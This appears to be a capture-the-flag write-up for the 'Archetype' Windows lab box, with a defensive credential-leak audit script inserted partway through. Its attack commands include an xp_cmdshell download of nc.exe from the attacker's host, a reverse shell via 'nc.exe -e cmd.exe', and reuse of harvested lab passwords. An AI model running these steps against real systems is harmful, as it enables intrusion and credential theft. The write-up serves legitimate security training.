Enumeration
Service Scan with nmap
The scan reveals multiple open ports and we can safely assume that the OS is Windows Server 2019. Additionally, there is a Microsoft SQL Server (1433), an SMB service (445), etc. All the findings are below for you to analyze.
# nmap -sV -sC -p- -T4 -oA archetype archetype.htb
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-09-23T23:07:52
|_Not valid after: 2051-09-23T23:07:52
|_ssl-date: 2021-09-24T12:32:06+00:00; +19m28s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h43m29s, deviation: 3h07m50s, median: 19m28s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-09-24T05:31:57-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-24T12:32:00
|_ start_date: N/A
In-depth SMB Enumeration & Exploit
Using smbmap with empty credentials to list the SMB shares and their permissions. Two shares are readable (read-only): backups and IPC$.
# smbmap -u ' ' -p ' ' -H 10.10.10.27
[+] Guest session IP: 10.10.10.27:445 Name: archetype.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backups READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Analysing the backups share reveals a config file, prod.dtsConfig, with a hardcoded password for the SQL service account:
# smbclient //10.10.10.27/backups
smb: \> ls
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
Pass: M3g4c0rp123 User: ARCHETYPE/sql_svc
# impacket-mssqlclient -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
To get a reverse shell I'll upload netcat onto the machine:
- Start a Python HTTP server in the directory holding the Windows binaries (which includes nc.exe):
┌──(root💀kali)-[~]
└─# cd /usr/share/windows-resources/binaries
┌──(root💀kali)-[/usr/share/windows-resources/binaries]
└─# python3 -m http.server 8000
- Download netcat from that server and save it as nc.exe in the temp folder:
SQL> xp_cmdshell powershell "wget -UseBasicParsing http://10.10.17.57:8000/nc.exe -OutFile %temp%\nc.exe"
- Set up a netcat listener to catch the incoming connection:
# nc -nvlp 4444
- Execute nc.exe so that it sends a cmd.exe shell back to our listener:
SQL> xp_cmdshell powershell "%temp%\nc.exe 10.10.17.57 4444 -e cmd.exe"

Privilege Escalation
By default, PowerShell on Windows 10 saves the last 4096 commands in a plain-text file in each user's profile: %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Reading it as sql_svc gives us a username and password: administrator : MEGACORP_4dm1n!!
C:\Users\sql_svc\AppData>type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
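As an added audit example (not part of this writeup), a script that covers both credential leaks on this box: the password embedded in the prod.dtsConfig connection string and the net use password recorded in ConsoleHost_history.txt. It assumes the standard SSIS configuration layout (Configuration elements holding a ConfiguredValue); the .dtsConfig and history samples inside are constructed with made-up values, and findings report only the password length so the output never re-leaks a secret.

```python
"""Audit helper for the two credential leaks seen on this box: a password in an SSIS
.dtsConfig connection string, and a 'net use' password in a PSReadline history. Added example."""
import re
import xml.etree.ElementTree as ET
# Constructed stand-in for prod.dtsConfig (standard SSIS configuration layout, made-up values).
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <Configuration ConfiguredType="Property" ValueType="String"
      Path="\\Package.Connections[Destination].Properties[ConnectionString]">
    <ConfiguredValue>Data Source=.;Password=Example_P4ss;User ID=EXAMPLE\\svc;Initial Catalog=Catalog;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""
# Constructed history lines following the 'net use ... /user:' pattern shown above.
SAMPLE_HISTORY = """dir
net.exe use T: \\\\Archetype\\backups /user:administrator Example_Adm1n!!
Get-Process
exit
"""

def redact(secret):
    """Report only the length so the audit output never re-leaks the value."""
    return "<redacted:%d chars>" % len(secret)

def dtsconfig_findings(xml_text):
    """(property path, user, redacted password) for every ConnectionString carrying Password= or Pwd=."""
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        value = conf.findtext("ConfiguredValue") or ""
        kv = {k.strip().lower(): v for k, v in (p.split("=", 1) for p in value.split(";") if "=" in p)}
        if "password" in kv or "pwd" in kv:
            pwd = kv.get("password", kv.get("pwd"))
            findings.append((conf.get("Path"), kv.get("user id", "?"), redact(pwd)))
    return findings

NET_USE_RE = re.compile(r"^\s*net(?:\.exe)?\s+use\b(?P<args>.*)$", re.IGNORECASE)

def history_findings(history_text):
    """(line number, user, redacted password) for 'net use' lines that pass the password inline."""
    findings = []
    for n, line in enumerate(history_text.splitlines(), 1):
        m = NET_USE_RE.match(line)
        if not m:
            continue
        toks = m.group("args").split()
        user = next((t.split(":", 1)[1] for t in toks if t.lower().startswith("/user:")), None)
        # The password is the bare token that is not a switch, a drive letter or a UNC path.
        pwd = [t for t in toks if not t.startswith(("/", "\\\\")) and not re.fullmatch(r"[A-Za-z]:", t)]
        if user and pwd:
            findings.append((n, user, redact(pwd[0])))
    return findings
```

Run it against a copied history file or an exported .dtsConfig by passing the file contents to the two functions; a non-empty result is a credential that belongs in a vault, not in a share or a shell history.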
Logging in as administrator to the C$ share, with -W to specify the workgroup and -U the username:
# smbclient //10.10.10.27/C$ -W ARCHETYPE -U administrator
Enter ARCHETYPE\administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd users\administrator\desktop
smb: \users\administrator\desktop\> get root.txt
getting file \users\administrator\desktop\root.txt of size 32 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \users\administrator\desktop\>
And finally, here is a gentle gorilla for you.